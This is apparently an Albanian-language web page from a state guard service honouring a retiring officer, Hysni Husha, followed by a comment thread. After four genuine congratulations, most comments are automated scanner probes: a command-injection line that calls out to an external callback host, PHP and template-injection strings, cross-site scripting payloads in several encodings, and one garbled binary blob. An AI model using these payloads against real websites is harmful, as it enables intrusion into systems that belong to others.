Mirënjohje për Hysni Hushën

Më shumë se për kontributin sot kemi nevojë për modelin e Hysës.

Dhe modeli i Hysës vlen të përgjithësohet. Në një ceremoni të thjeshtë, Drejtori i Përgjithshëm, nderoi me certifikatën e mirënjohjes Hysni Hushën, me rastin e daljes në pension.

Hysa, siç e kemi thirrur, la gjurmë aty ku shërbeu. Mjeshtër i eskortave dhe hapjes së rrugës, i papërtuar dhe i palodhur.

Kolegë֝t që kanë punuar me Hysën e portretizojnë si njeriun që nuk bën kompromis me detyrën.

Sot, kur mosha bën të vetën dhe duhet të kalojë në një faze tjetër, në pension, i urojmë Hysës jetë të gjatë dhe shëndet. Mos harro se kemi nevojë për përvojën tënde.

55 Comments

 1. Urime Hysës, jetë e shëndet. Faleminderit për gjithçka ke ofruar.

 2. Urime zemer dhe pension te mbare

 3. Urime zemer e pension te mbare

 4. Z.Hysni te pershendes karakteri dinjiteti i juaj dhe mbi gjithcka pergjegjshmeria e juaj te imponon respekt .Nga une Sokrat Suku suksese dhe mbarsi ne jeten e familjen Tuaj.

 5. 555

 6. 1yd2iXIYO

 7. `(nslookup hitbyuxdcjwsx8ec11.bxss.me||perl -e “gethostbyname(‘hitbyuxdcjwsx8ec11.bxss.me’)”)`

 8. sOu6tTMc

 9. )

 10. ${@print(md5(31337))}

 11. 555

 12. ${@print(md5(31337))}\

 13. ‘.print(md5(31337)).’

 14. 555′”()&%jwRQ(9166)

 15. ‘”()&%jwRQ(9033)

 16. 5559276494

 17. acu10709<s1﹥s2ʺs3ʹuca10709

 18. acux7507z1z2abcxuca7507

 19. CWS000x=1N@E߮I)@ HiP”DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)”T7$HD6)x)ؒ\C|QNcb b_&5 hg
  ]s0QL

 20. <th:t="${acx}#foreach

 21. 1}}”}}’}}1%>”%>’%>

 22. acx{{98991*97996}}xca

 23. acx[[${98991*97996}]]xca

 24. acx__${98991*97996}__::.x

 25. “acxzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)

 26. 555jwRQ(9406)

 27. 555′”()&%Yp4o(9032)

 28. ‘”()&%Yp4o(9292)

 29. 5559779738

 30. acu8362<s1﹥s2ʺs3ʹuca8362

 31. acux8540z1z2abcxuca8540

 32. 555Yp4o(9283)

 33. 555QEOU3[!+!]

 34. 555Yp4o(9093)

 35. 555<ScRIpT>Yp4o(9773)</sCrIpT>

 36. 555Yp4o(9292)

 37. 555Yp4o(9071)

 38. 555″ onerror=alert(9180)>

 39. %35%35%35%3C%53%63%52%69%50%74%20%3E%59%70%34%6F%289369%29%3C%2F%73%43%72%69%70%54%3E

 40. 555\u003CScRiPt\Yp4o(9710)\u003C/sCripT\u003E

 41. 555<ScRiPt>Yp4o(9118)</sCripT>

 42. 555}body{acu:Expre/**/SSion(Yp4o(9954))}

 43. 555vLeAZ
  Yp4o(9933)

 44. 555ERAL4[!+!]

 45. 555<vF1CRp<

Submit a Comment

Your email address will not be published.

stema

© Garda e Republikës 2022 - Të gjitha të drejtat e rezervuara.